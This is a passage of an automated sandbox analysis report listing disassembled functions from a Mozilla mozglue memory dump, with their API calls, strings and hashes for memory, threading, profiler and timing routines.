GetCurrentProcess.KERNEL32 ref: 6C655F66
DuplicateHandle.KERNEL32(00000000,?,?,?,0000004A,00000000,00000000), ref: 6C655F7E
moz_xmalloc.MOZGLUE(00000024), ref: 6C655F27

Part of subcall function 6C65CA10: mozalloc_abort.MOZGLUE(?), ref: 6C65CAA2

moz_xmalloc.MOZGLUE(00000040,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6C6555E1), ref: 6C655E8C

Part of subcall function 6C65CA10: malloc.MOZGLUE(?), ref: 6C65CA26

moz_xmalloc.MOZGLUE(00000050,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6C6555E1), ref: 6C65605D
free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6C6555E1), ref: 6C6560CC

Strings

GeckoMain, xrefs: 6C655ECE, 6C656015

Memory Dump Source

Source File: 00000000.00000002.2308095573.000000006C641000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C640000, based on PE: true

Associated: 00000000.00000002.2308058750.000000006C640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308204883.000000006C6BD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308284101.000000006C6CE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308318727.000000006C6D2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c640000_file.jbxd

Similarity

API ID: Currentmoz_xmalloc$Thread$CriticalProcessSectionmemcpy$Count64CounterDuplicateEnterHandleLeaveNow@PerformanceQueryStamp@mozilla@@TickTimeV12@_freemallocmozalloc_abortstrlen
String ID: GeckoMain
API String ID: 3711609982-966795396
Opcode ID: f8f5213453d9bf3d5a20de0d4b5505d4ca70910351c3b8d3bee89e59bc45a3f6
Instruction ID: 96b5c54d2b298c780f419a119bcfe83efc01d51e8fb857fb2ddb88334a1e3611
Opcode Fuzzy Hash: f8f5213453d9bf3d5a20de0d4b5505d4ca70910351c3b8d3bee89e59bc45a3f6
Instruction Fuzzy Hash: C771D2B0A047409FD710DF29C4C0A6ABBF0FF9A308F54496DE58687B52D731E958CB9A

Function 6C659590 Relevance: 24.7, APIs: 10, Strings: 4, Instructions: 192libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 6C6431C0: LoadLibraryW.KERNEL32(KernelBase.dll), ref: 6C643217
Part of subcall function 6C6431C0: GetProcAddress.KERNEL32(00000000,QueryInterruptTime), ref: 6C643236
Part of subcall function 6C6431C0: FreeLibrary.KERNEL32 ref: 6C64324B
Part of subcall function 6C6431C0: __Init_thread_footer.LIBCMT ref: 6C643260
Part of subcall function 6C6431C0: ?ProcessCreation@TimeStamp@mozilla@@SA?AV12@XZ.MOZGLUE(?), ref: 6C64327F
Part of subcall function 6C6431C0: ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C64328E
Part of subcall function 6C6431C0: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6C6432AB
Part of subcall function 6C6431C0: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6C6432D1
Part of subcall function 6C6431C0: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?), ref: 6C6432E5
Part of subcall function 6C6431C0: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?), ref: 6C6432F7

LoadLibraryW.KERNEL32(Api-ms-win-core-memory-l1-1-5.dll), ref: 6C659675
__Init_thread_footer.LIBCMT ref: 6C659697
LoadLibraryW.KERNEL32(ntdll.dll), ref: 6C6596E8
GetProcAddress.KERNEL32(00000000,NtMapViewOfSection), ref: 6C659707
__Init_thread_footer.LIBCMT ref: 6C65971F
SetLastError.KERNEL32(00000000,?,?,00000002,?,?), ref: 6C659773
GetProcAddress.KERNEL32(00000000,MapViewOfFileNuma2), ref: 6C6597B7
FreeLibrary.KERNEL32 ref: 6C6597D0
FreeLibrary.KERNEL32 ref: 6C6597EB
SetLastError.KERNEL32(00000000,?,?,00000002,?,?), ref: 6C659824

Strings

ntdll.dll, xrefs: 6C6596E3
Api-ms-win-core-memory-l1-1-5.dll, xrefs: 6C659670
MapViewOfFileNuma2, xrefs: 6C6597B1
NtMapViewOfSection, xrefs: 6C659701

Memory Dump Source

Source File: 00000000.00000002.2308095573.000000006C641000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C640000, based on PE: true

Associated: 00000000.00000002.2308058750.000000006C640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308204883.000000006C6BD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308284101.000000006C6CE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308318727.000000006C6D2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c640000_file.jbxd

Similarity

API ID: LibraryTime$StampV01@@Value@mozilla@@$AddressFreeInit_thread_footerLoadProc$ErrorLastStamp@mozilla@@$Creation@Now@ProcessV12@V12@_
String ID: Api-ms-win-core-memory-l1-1-5.dll$MapViewOfFileNuma2$NtMapViewOfSection$ntdll.dll
API String ID: 3361784254-3880535382
Opcode ID: 0e2b2caa8947dc6d0cd7b48d3cd02e7f60f497f984ff98936dfd638528b72360
Instruction ID: cc9632ecbd2b86bb7b072503f5eb641311e6a9625c49afb0b68f8da0cd9dde97
Opcode Fuzzy Hash: 0e2b2caa8947dc6d0cd7b48d3cd02e7f60f497f984ff98936dfd638528b72360
Instruction Fuzzy Hash: 2A61F8B17002059FDF00CF66E8D4B9A7BB0EB4A758F608519ED1993780D730E965CBAE

Function 6C6A6660 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 162threadCOMMON

Download Yara Rule

APIs

InitializeCriticalSection.KERNEL32(6C6CF618), ref: 6C6A6694
GetThreadId.KERNEL32(?), ref: 6C6A66B1
GetCurrentThreadId.KERNEL32 ref: 6C6A66B9
memset.VCRUNTIME140(?,00000000,00000100), ref: 6C6A66E1
EnterCriticalSection.KERNEL32(6C6CF618), ref: 6C6A6734
GetCurrentProcess.KERNEL32 ref: 6C6A673A
LeaveCriticalSection.KERNEL32(6C6CF618), ref: 6C6A676C
GetCurrentThread.KERNEL32 ref: 6C6A67FC
memset.VCRUNTIME140(?,00000000,000002C8), ref: 6C6A6868
RtlCaptureContext.NTDLL ref: 6C6A687F

Strings

WalkStack64, xrefs: 6C6A6890

Memory Dump Source

Source File: 00000000.00000002.2308095573.000000006C641000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C640000, based on PE: true

Associated: 00000000.00000002.2308058750.000000006C640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308204883.000000006C6BD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308284101.000000006C6CE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308318727.000000006C6D2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c640000_file.jbxd

Similarity

API ID: CriticalCurrentSectionThread$memset$CaptureContextEnterInitializeLeaveProcess
String ID: WalkStack64
API String ID: 2357170935-3499369396
Opcode ID: 33deeed79cc06f25fac7469811c703bf8c20484c32530b5f6e5ea5672a6432db
Instruction ID: be914ce54481033153e63d255a3863217c2302cb855a3257ae04b3227dbf3719
Opcode Fuzzy Hash: 33deeed79cc06f25fac7469811c703bf8c20484c32530b5f6e5ea5672a6432db
Instruction Fuzzy Hash: 1A51BF71A09301AFD711CF69C884B9ABBF4FF89714F00492DF59997640D770EA0ACB9A

Function 6C68DE60 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 135threadCOMMON

Download Yara Rule

APIs

Part of subcall function 6C689420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C654A68), ref: 6C68945E
Part of subcall function 6C689420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C689470
Part of subcall function 6C689420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C689482
Part of subcall function 6C689420: __Init_thread_footer.LIBCMT ref: 6C68949F

GetCurrentThreadId.KERNEL32 ref: 6C68DE73
GetCurrentThreadId.KERNEL32 ref: 6C68DF7D
AcquireSRWLockExclusive.KERNEL32(6C6CF4B8), ref: 6C68DF8A
ReleaseSRWLockExclusive.KERNEL32(6C6CF4B8), ref: 6C68DFC9
GetCurrentThreadId.KERNEL32 ref: 6C68DFF7
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C68E000
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,6C654A68), ref: 6C68DE7B

Part of subcall function 6C6894D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C6894EE
Part of subcall function 6C6894D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C689508

Part of subcall function 6C67CBE8: GetCurrentProcess.KERNEL32(?,6C6431A7), ref: 6C67CBF1
Part of subcall function 6C67CBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C6431A7), ref: 6C67CBFA

?RegisterProfilerLabelEnterExit@mozilla@@YAXP6APAXPBD0PAX@ZP6AX1@Z@Z.MOZGLUE(00000000,00000000,?,?,?,6C654A68), ref: 6C68DEB8
free.MOZGLUE(00000000,?,6C654A68), ref: 6C68DEFE
?ReleaseBufferForMainThreadAddMarker@base_profiler_markers_detail@mozilla@@YAXXZ.MOZGLUE ref: 6C68DF38

Strings

[I %d/%d] profiler_set_process_name("%s", "%s"), xrefs: 6C68E00E
[I %d/%d] locked_profiler_stop, xrefs: 6C68DE83
<none>, xrefs: 6C68DFD7

Memory Dump Source

Source File: 00000000.00000002.2308095573.000000006C641000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C640000, based on PE: true

Associated: 00000000.00000002.2308058750.000000006C640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308204883.000000006C6BD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308284101.000000006C6CE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308318727.000000006C6D2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c640000_file.jbxd

Similarity

API ID: CurrentThread$getenv$ExclusiveLockProcessRelease_getpid$AcquireBufferEnterExit@mozilla@@Init_thread_footerLabelMainMarker@base_profiler_markers_detail@mozilla@@ProfilerRegisterTerminate__acrt_iob_func__stdio_common_vfprintffree
String ID: <none>$[I %d/%d] locked_profiler_stop$[I %d/%d] profiler_set_process_name("%s", "%s")
API String ID: 1281939033-809102171
Opcode ID: 7ce85191ea10c9efc7a31f54ec6103e07178790f86afb3d30f435d82f01a6080
Instruction ID: 874d10c5ff16741b589ac77f08546a28c3a696d3aa76ee302c23fd191c2ff61f
Opcode Fuzzy Hash: 7ce85191ea10c9efc7a31f54ec6103e07178790f86afb3d30f435d82f01a6080
Instruction Fuzzy Hash: 88411731B022119BDB109F66D8887AE7775EF8630CF144416E90997B42CB759A06CBFF

Function 6C69D4D0 Relevance: 21.2, APIs: 14, Instructions: 165threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6C69D4F0
AcquireSRWLockExclusive.KERNEL32(?), ref: 6C69D4FC
ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C69D52A
GetCurrentThreadId.KERNEL32 ref: 6C69D530
AcquireSRWLockExclusive.KERNEL32(?), ref: 6C69D53F
ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C69D55F
free.MOZGLUE(00000000), ref: 6C69D585
?_Xbad_function_call@std@@YAXXZ.MSVCP140 ref: 6C69D5D3
GetCurrentThreadId.KERNEL32 ref: 6C69D5F9
AcquireSRWLockExclusive.KERNEL32(?), ref: 6C69D605
ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C69D652
GetCurrentThreadId.KERNEL32 ref: 6C69D658
AcquireSRWLockExclusive.KERNEL32(?), ref: 6C69D667
ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C69D6A2

Memory Dump Source

Source File: 00000000.00000002.2308095573.000000006C641000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C640000, based on PE: true

Associated: 00000000.00000002.2308058750.000000006C640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308204883.000000006C6BD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308284101.000000006C6CE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308318727.000000006C6D2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c640000_file.jbxd

Similarity

API ID: ExclusiveLock$AcquireCurrentReleaseThread$Xbad_function_call@std@@free
String ID:
API String ID: 2206442479-0
Opcode ID: 8beed0fb7a5d64f4aa1df19a05b375d0a82f85fd1cd95c6ddc3daba004283bec
Instruction ID: 2b0529c11e02890c950413dc11fb1f4f9347b33e32e6a33fd4c07740b766cf43
Opcode Fuzzy Hash: 8beed0fb7a5d64f4aa1df19a05b375d0a82f85fd1cd95c6ddc3daba004283bec
Instruction Fuzzy Hash: 4F518C71604705EFC704CF35C884A9ABBF4FF8A358F108A2EE94A87710DB30A955CB99

Function 6C665670 Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 272timeCOMMON

Download Yara Rule

APIs

getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_APP_RESTART), ref: 6C6656D1
?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C6656E9
?ComputeProcessUptime@TimeStamp@mozilla@@CA_KXZ.MOZGLUE ref: 6C6656F1
?TicksFromMilliseconds@BaseTimeDurationPlatformUtils@mozilla@@SA_JN@Z.MOZGLUE ref: 6C665744
??0TimeStampValue@mozilla@@AAE@_K0_N@Z.MOZGLUE(?,?,?,?,?), ref: 6C6657BC
GetTickCount64.KERNEL32 ref: 6C6658CB
EnterCriticalSection.KERNEL32(6C6CF688), ref: 6C6658F3
__aulldiv.LIBCMT ref: 6C665945
LeaveCriticalSection.KERNEL32(6C6CF688), ref: 6C6659B2
??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(6C6CF638,?,?,?,?), ref: 6C6659E9

Strings

MOZ_APP_RESTART, xrefs: 6C6656CC

Memory Dump Source

Source File: 00000000.00000002.2308095573.000000006C641000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C640000, based on PE: true

Associated: 00000000.00000002.2308058750.000000006C640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308204883.000000006C6BD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308284101.000000006C6CE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308318727.000000006C6D2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c640000_file.jbxd

Similarity

API ID: Time$CriticalSectionStampStamp@mozilla@@Value@mozilla@@$BaseComputeCount64DurationEnterFromLeaveMilliseconds@Now@PlatformProcessTickTicksUptime@Utils@mozilla@@V01@@V12@___aulldivgetenv
String ID: MOZ_APP_RESTART
API String ID: 2752551254-2657566371
Opcode ID: dd65d49c6a33d38fd95cd3d6a61c589e94db42062cfa4f20f63eeefc54b687bd
Instruction ID: fbbfba8ae132824c63f58a266fe43f6db016fa8a739fa5136c3dc93d8376eddd
Opcode Fuzzy Hash: dd65d49c6a33d38fd95cd3d6a61c589e94db42062cfa4f20f63eeefc54b687bd
Instruction Fuzzy Hash: DFC18E71A087809FD705CF2AC48165ABBF1FFCA714F058A1DE8C597A61D730A985CB8B

Function 6C68EC70 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 81threadsynchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 6C689420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C654A68), ref: 6C68945E
Part of subcall function 6C689420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C689470
Part of subcall function 6C689420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C689482
Part of subcall function 6C689420: __Init_thread_footer.LIBCMT ref: 6C68949F

GetCurrentThreadId.KERNEL32 ref: 6C68EC84
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C68EC8C

Part of subcall function 6C6894D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C6894EE
Part of subcall function 6C6894D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C689508

GetCurrentThreadId.KERNEL32 ref: 6C68ECA1
AcquireSRWLockExclusive.KERNEL32(6C6CF4B8), ref: 6C68ECAE
?profiler_init@baseprofiler@mozilla@@YAXPAX@Z.MOZGLUE(00000000), ref: 6C68ECC5
ReleaseSRWLockExclusive.KERNEL32(6C6CF4B8), ref: 6C68ED0A
WaitForSingleObject.KERNEL32(?,000000FF), ref: 6C68ED19
CloseHandle.KERNEL32(?), ref: 6C68ED28
free.MOZGLUE(00000000), ref: 6C68ED2F
ReleaseSRWLockExclusive.KERNEL32(6C6CF4B8), ref: 6C68ED59

Strings

[I %d/%d] profiler_ensure_started, xrefs: 6C68EC94

Memory Dump Source

Source File: 00000000.00000002.2308095573.000000006C641000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C640000, based on PE: true

Associated: 00000000.00000002.2308058750.000000006C640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308204883.000000006C6BD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308284101.000000006C6CE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308318727.000000006C6D2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c640000_file.jbxd

Similarity

API ID: ExclusiveLockgetenv$CurrentReleaseThread$?profiler_init@baseprofiler@mozilla@@AcquireCloseHandleInit_thread_footerObjectSingleWait__acrt_iob_func__stdio_common_vfprintf_getpidfree
String ID: [I %d/%d] profiler_ensure_started
API String ID: 4057186437-125001283
Opcode ID: a740993c5c8396938678a2a2b6fd062693ad15b105261e8f76a76e9dc85865bf
Instruction ID: 0078449b86ff71ee6a24ee4d87544a4b78bbd2cb86ff028e80d790c888a2a03d
Opcode Fuzzy Hash: a740993c5c8396938678a2a2b6fd062693ad15b105261e8f76a76e9dc85865bf
Instruction Fuzzy Hash: 8A21F779601104ABDF009F65D848A9A3779EF8A36DF108211FD1897742DB35990ACBFE

Function 6C688ED0 Relevance: 17.8, APIs: 1, Strings: 9, Instructions: 311COMMON

Download Yara Rule

APIs

Part of subcall function 6C64EB30: free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C64EB83

?FormatToStringSpan@MarkerSchema@mozilla@@CA?AV?$Span@$$CBD$0PPPPPPPP@@2@W4Format@12@@Z.MOZGLUE(?,?,00000004,?,?,?,?,?,?,6C68B392,?,?,00000001), ref: 6C6891F4

Part of subcall function 6C67CBE8: GetCurrentProcess.KERNEL32(?,6C6431A7), ref: 6C67CBF1
Part of subcall function 6C67CBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C6431A7), ref: 6C67CBFA

Strings

name, xrefs: 6C688F16
marker-chart, xrefs: 6C68905E
timeline-memory, xrefs: 6C689088
timeline-fileio, xrefs: 6C6890A4
timeline-overview, xrefs: 6C68907A
marker-table, xrefs: 6C68906C
data, xrefs: 6C6890E8
stack-chart, xrefs: 6C6890B2
timeline-ipc, xrefs: 6C689096

Memory Dump Source

Source File: 00000000.00000002.2308095573.000000006C641000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C640000, based on PE: true

Associated: 00000000.00000002.2308058750.000000006C640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308204883.000000006C6BD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308284101.000000006C6CE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308318727.000000006C6D2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c640000_file.jbxd

Similarity

API ID: Process$CurrentFormatFormat@12@@MarkerP@@2@Schema@mozilla@@Span@Span@$$StringTerminatefree
String ID: data$marker-chart$marker-table$name$stack-chart$timeline-fileio$timeline-ipc$timeline-memory$timeline-overview
API String ID: 3790164461-3347204862
Opcode ID: 15aae8bf6533bb42443874063df0ad246454d1e512912ad1b1df4e101d46ce6f
Instruction ID: 58df64a0934250bf90cb941c34eebf5d1aeedb14a9176b1f9099513b721ef14f
Opcode Fuzzy Hash: 15aae8bf6533bb42443874063df0ad246454d1e512912ad1b1df4e101d46ce6f
Instruction Fuzzy Hash: F1B1C1B0B022099BDB04CF95C891BEEBBB5EF85318F204429D502ABF94D7319955CBED

Function 6C66C570 Relevance: 17.8, APIs: 8, Strings: 2, Instructions: 277stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6C66C5A3
WideCharToMultiByte.KERNEL32 ref: 6C66C9EA
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 6C66C9FB
WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 6C66CA12
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C66CA2E
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C66CAA5

Strings

0, xrefs: 6C66D30A
(null), xrefs: 6C66C596

Memory Dump Source

Source File: 00000000.00000002.2308095573.000000006C641000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C640000, based on PE: true

Associated: 00000000.00000002.2308058750.000000006C640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308204883.000000006C6BD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308284101.000000006C6CE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308318727.000000006C6D2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c640000_file.jbxd

Similarity

API ID: ByteCharMultiWidestrlen$freemalloc
String ID: (null)$0
API String ID: 4074790623-38302674
Opcode ID: e2c4218dcb02e675b568a78a4eeec0d5707ca5e1c78ff763d661da3e5537e043
Instruction ID: 3d2f2dd2de42e46eb853bf38a3aa19eac38b60ec69b64cb567849069569557f8
Opcode Fuzzy Hash: e2c4218dcb02e675b568a78a4eeec0d5707ca5e1c78ff763d661da3e5537e043
Instruction Fuzzy Hash: 3FA1A030608741AFDB00DF2AC59475ABBE1AFCA748F14891DE99AD7B41D731E805CB8B

Function 6C643480 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 86librarytimeloaderCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,6C643284,?,?,6C6656F6), ref: 6C643492
GetProcessTimes.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,6C643284,?,?,6C6656F6), ref: 6C6434A9
LoadLibraryW.KERNEL32(kernel32.dll,?,?,?,?,?,?,?,?,6C643284,?,?,6C6656F6), ref: 6C6434EF
GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 6C64350E
__Init_thread_footer.LIBCMT ref: 6C643522
__aulldiv.LIBCMT ref: 6C643552
FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,6C643284,?,?,6C6656F6), ref: 6C64357C
GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,6C643284,?,?,6C6656F6), ref: 6C643592

Part of subcall function 6C67AB89: EnterCriticalSection.KERNEL32(6C6CE370,?,?,?,6C6434DE,6C6CF6CC,?,?,?,?,?,?,?,6C643284), ref: 6C67AB94
Part of subcall function 6C67AB89: LeaveCriticalSection.KERNEL32(6C6CE370,?,6C6434DE,6C6CF6CC,?,?,?,?,?,?,?,6C643284,?,?,6C6656F6), ref: 6C67ABD1

Strings

kernel32.dll, xrefs: 6C6434EA
GetSystemTimePreciseAsFileTime, xrefs: 6C643508

Memory Dump Source

Source File: 00000000.00000002.2308095573.000000006C641000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C640000, based on PE: true

Associated: 00000000.00000002.2308058750.000000006C640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308204883.000000006C6BD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308284101.000000006C6CE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308318727.000000006C6D2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c640000_file.jbxd

Similarity

API ID: CriticalLibraryProcessSectionTime$AddressCurrentEnterFileFreeInit_thread_footerLeaveLoadProcSystemTimes__aulldiv
String ID: GetSystemTimePreciseAsFileTime$kernel32.dll
API String ID: 3634367004-706389432
Opcode ID: 6c2c35a9111d9f1367c5f61075365f59a925f9d6ecdd4641c775668eaa6bf081
Instruction ID: b744aeda3812c03dbc570d34af19ca458c0f96f765dbf5d110f67cc2a411b31e
Opcode Fuzzy Hash: 6c2c35a9111d9f1367c5f61075365f59a925f9d6ecdd4641c775668eaa6bf081
Instruction Fuzzy Hash: E331A771B001059BDF14EFBBC888AAE7775FB8A705F108429E505D3750DB70AA05CF69

Function 6C644480 Relevance: 16.8, APIs: 11, Instructions: 316COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(B60B60B8,?,?,?,?,6C684843,?), ref: 6C6445F5
free.MOZGLUE(?,?,?,?,?,?,?,?,6C684843,?), ref: 6C64468A
free.MOZGLUE(?,?,?,?,?,?,6C684843,?), ref: 6C6446C9
free.MOZGLUE(?), ref: 6C6446EF
free.MOZGLUE(?), ref: 6C644712
free.MOZGLUE(?), ref: 6C644735
free.MOZGLUE(?), ref: 6C644758
free.MOZGLUE(?), ref: 6C64477B
free.MOZGLUE(?), ref: 6C64479E

Memory Dump Source

Source File: 00000000.00000002.2308095573.000000006C641000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C640000, based on PE: true

Associated: 00000000.00000002.2308058750.000000006C640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308204883.000000006C6BD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308284101.000000006C6CE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308318727.000000006C6D2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c640000_file.jbxd

Similarity

API ID: free$moz_xmalloc
String ID:
API String ID: 3009372454-0
Opcode ID: 62d873f8a93de8b4d809c9eabbeee5e21e1b8e2351d27aa6ee490eda4da40993
Instruction ID: bf7e69315fabc3c8edd593c2e3cbb5540b203e7cbdb99c0540e8b6bfdb8f10b2
Opcode Fuzzy Hash: 62d873f8a93de8b4d809c9eabbeee5e21e1b8e2351d27aa6ee490eda4da40993
Instruction Fuzzy Hash: 24B1D471A001508FDB18DE3CD8D27BD76A2AF42328F18C669E416DBF96D7B1D8408B99

Function 6C6AAC20 Relevance: 16.6, APIs: 11, Instructions: 92fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32 ref: 6C6AAC52
CreateFileMappingW.KERNEL32 ref: 6C6AAC7D
GetSystemInfo.KERNEL32 ref: 6C6AAC98
MapViewOfFile.KERNEL32 ref: 6C6AACB0
GetSystemInfo.KERNEL32 ref: 6C6AACCD
MapViewOfFile.KERNEL32 ref: 6C6AAD05
UnmapViewOfFile.KERNEL32 ref: 6C6AAD1C
CloseHandle.KERNEL32 ref: 6C6AAD28
UnmapViewOfFile.KERNEL32 ref: 6C6AAD37
CloseHandle.KERNEL32 ref: 6C6AAD43
CloseHandle.KERNEL32 ref: 6C6AAD67

Memory Dump Source

Source File: 00000000.00000002.2308095573.000000006C641000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C640000, based on PE: true

Associated: 00000000.00000002.2308058750.000000006C640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308204883.000000006C6BD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308284101.000000006C6CE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308318727.000000006C6D2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c640000_file.jbxd

Similarity

API ID: File$View$CloseHandle$CreateInfoSystemUnmap$Mapping
